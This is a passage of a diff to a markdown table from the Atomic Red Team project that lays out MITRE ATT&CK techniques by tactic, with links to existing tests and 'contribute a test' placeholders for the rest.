-| | | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Proc Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md) | | | | Encrypted Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Content Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
-| | | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Signed Binary Proxy Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Password Policy Discovery](../../T1201/T1201.md) | | | | Bidirectional Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Shutdown/Reboot](../../T1529/T1529.md) |
-| | | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | [Indicator Removal on Host: Timestomp](../../T1070.006/T1070.006.md) | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md) | | | | Asymmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | Reflective Code Loading [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Location Discovery](../../T1614/T1614.md) | | | | Non-Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ignore Process Interrupts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md) | [Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md) | | | | Protocol Impersonation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | Event Triggered Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ptrace System Calls [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Time Based Evasion](../../T1497.003/T1497.003.md) | Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote System Discovery](../../T1018/T1018.md) | | | | Domain Fronting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | [Event Triggered Execution: .bash_profile .bashrc and .shrc](../../T1546.004/T1546.004.md) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Impair Defenses: Disable or Modify System Firewall](../../T1562.004/T1562.004.md) | Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Service Discovery](../../T1046/T1046.md) | | | | Data Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | Electron Applications [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | Non-Standard Encoding [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | Server Software Component [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Impair Defenses: Disable or Modify Linux Audit System](../../T1562.012/T1562.012.md) | [OS Credential Dumping: /etc/passwd, /etc/master.passwd and /etc/shadow](../../T1003.008/T1003.008.md) | Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | [Application Layer Protocol: Web Protocols](../../T1071.001/T1071.001.md) | |
-| | | Installer Packages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Obfuscated Files or Information: Binary Padding](../../T1027.001/T1027.001.md) | Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Time Discovery](../../T1124/T1124.md) | | | | [Ingress Tool Transfer](../../T1105/T1105.md) | |
-| | | [Boot or Logon Initialization Scripts: Rc.common](../../T1037.004/T1037.004.md) | | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | Hide Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | [Create or Modify System Process: SysV/Systemd Service](../../T1543.002/T1543.002.md) | | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | | | | | | [Data Obfuscation via Steganography](../../T1001.002/T1001.002.md) | |
-| | | Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | File and Directory Permissions Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | XDG Autostart Entries [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | [Proxy: Internal Proxy](../../T1090.001/T1090.001.md) | |
-| | | Power Settings [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | | | | | | Dead Drop Resolver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | | [Impair Defenses: Indicator Blocking](../../T1562.006/T1562.006.md) | | | | | | Junk Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | |
-| | | Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Right-to-Left Override [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | | | | | | |
+| Compromise Software Dependencies and Development Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fileless Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [System Network Configuration Discovery: Internet Connection Discovery](../../T1016.001/T1016.001.md) | Taint Shared Content [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Screen Capture](../../T1113/T1113.md) | Exfiltration Over Webhook [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encoding: Standard Encoding](../../T1132.001/T1132.001.md) | Direct Network Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing: Spearphishing Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution: Malicious File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Embedded Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Remote Services: SSH](../../T1021.004/T1021.004.md) | Adversary-in-the-Middle [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Domain Generation Algorithms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing: Spearphishing Attachment [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Modify Authentication Process: Pluggable Authentication Modules](../../T1556.003/T1556.003.md) | [Brute Force: Password Guessing](../../T1110.001/T1110.001.md) | Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | SSH Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Input Capture: Keylogging](../../T1056.001/T1056.001.md) | Exfiltration Over Other Network Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol: DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Hardware Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | File/Path Exclusions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Domain Account](../../T1087.002/T1087.002.md) | Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Audio Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Bluetooth [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Publish/Subscribe Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Supply Chain Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Native API [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | External Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | [File and Directory Permissions Modification: FreeBSD, Linux and Mac File and Directory Permissions Modification](../../T1222.002/T1222.002.md) | Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Discovery: Local Account](../../T1087.001/T1087.001.md) | Remote Service Session Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Archive via Custom Method [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Exfiltration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Symmetric Cryptography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Disk Wipe [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Exploit Public-Facing Application [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Email Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Symmetric Encrypted Non-C2 Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Fast Flux DNS [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stored Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Boot or Logon Autostart Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Hide Artifacts: Email Hiding Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Cracking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md) | Exploitation of Remote Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data from Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration to Code Repository [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application Layer Protocol [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Service Stop](../../T1489/T1489.md) |
+| Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Software Deployment Tools [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Cron](../../T1053.003/T1053.003.md) | Process Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Encrypted/Encoded File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [OS Credential Dumping: Proc Filesystem](../../T1003.007/T1003.007.md) | [System Service Discovery](../../T1007/T1007.md) | Internal Spearphishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Staged: Local Data Staging](../../T1074.001/T1074.001.md) | [Exfiltration Over Alternative Protocol - Exfiltration Over Asymmetric Encrypted Non-C2 Protocol](../../T1048.002/T1048.002.md) | Remote Access Software [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Application or System Exploitation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Trusted Relationship [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Server Software Component: Transport Agent [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Escape to Host [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Rootkit](../../T1014/T1014.md) | Password Managers [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Network Sniffing](../../T1040/T1040.md) | Lateral Tool Transfer [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over C2 Channel [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Content Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Runtime Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Phishing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Bash](../../T1059.004/T1059.004.md) | Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Sudo and Sudo Caching](../../T1548.003/T1548.003.md) | [Network Sniffing](../../T1040/T1040.md) | [Network Share Discovery](../../T1135/T1135.md) | | [Clipboard Data](../../T1115/T1115.md) | [Exfiltration Over Alternative Protocol](../../T1048/T1048.md) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Reflection Amplification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Extensions](../../T1176/T1176.md) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Ccache Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Peripheral Device Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Remote Data Staging [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration over USB [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Protocol Tunneling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Service Exhaustion Flood [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing Voice [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Lua [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Additional Local or Domain Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | [Masquerading: Match Legitimate Name or Location](../../T1036.005/T1036.005.md) | Steal or Forge Kerberos Tickets [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Information Discovery](../../T1082/T1082.md) | | [Data from Local System](../../T1005/T1005.md) | Exfiltration Over Web Service: Exfiltration to Text Storage Sites [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Mail Protocols [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Compromise Software Supply Chain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Abuse Elevation Control Mechanism [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Masquerade File Type [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Credentials from Password Stores [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Network Configuration Discovery: Wi-Fi Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | [Archive Collected Data: Archive via Library](../../T1560.002/T1560.002.md) | Exfiltration Over Web Service: Exfiltration to Cloud Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Communication Through Removable Media [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Bandwidth Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Command and Scripting Interpreter: Python](../../T1059.006/T1059.006.md) | Server Software Component: Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Abuse Elevation Control Mechanism: Setuid and Setgid](../../T1548.001/T1548.001.md) | Hide Artifacts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials](../../T1552/T1552.md) | Application Window Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Archive Collected Data [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Transfer Size Limits](../../T1030/T1030.md) | External Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Financial Theft [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Hardware Additions [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Valid Accounts: Default Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md) | [Credentials from Password Stores: Credentials from Web Browsers](../../T1555.003/T1555.003.md) | [Time Based Evasion](../../T1497.003/T1497.003.md) | | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Exfiltration Over Physical Medium [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Proxy [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Defacement: Internal Defacement [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Command and Scripting Interpreter: Visual Basic [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Event Triggered Execution: Trap](../../T1546.005/T1546.005.md) | VDSO Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear FreeBSD, Linux or Mac System Logs](../../T1070.002/T1070.002.md) | DHCP Spoofing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Browser Bookmark Discovery](../../T1217/T1217.md) | | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol](../../T1048.003/T1048.003.md) | Dynamic Resolution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Compute Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Hijack Execution Flow: LD_PRELOAD](../../T1574.006/T1574.006.md) | Account Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Stripped Payloads [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Unsecured Credentials: Private Keys](../../T1552.004/T1552.004.md) | [System Network Configuration Discovery](../../T1016/T1016.md) | | Video Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Web Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Data Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
+| [Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md) | [Scheduled Task/Job: At](../../T1053.002/T1053.002.md) | [Create Account: Local Account](../../T1136.001/T1136.001.md) | [Boot or Logon Autostart Execution: Kernel Modules and Extensions](../../T1547.006/T1547.006.md) | Break Process Trees [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Brute Force: Password Spraying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Email Collection: Email Forwarding Rule [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | DNS Calculation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Account Access Removal](../../T1531/T1531.md) |
+| | | [SSH Authorized Keys](../../T1098.004/T1098.004.md) | [Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) | Clear Network Connection History and Configurations [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [File and Directory Discovery](../../T1083/T1083.md) | | Data Staged [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Multi-Stage Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Data Encrypted for Impact](../../T1486/T1486.md) |
+| | | [Create Account: Domain Account](../../T1136.002/T1136.002.md) | Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [Indicator Removal on Host: Clear Command History](../../T1070.003/T1070.003.md) | OS Credential Dumping: Cached Domain Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | [System Network Connections Discovery](../../T1049/T1049.md) | | Input Capture: GUI Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | | Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) | Endpoint Denial of Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) |
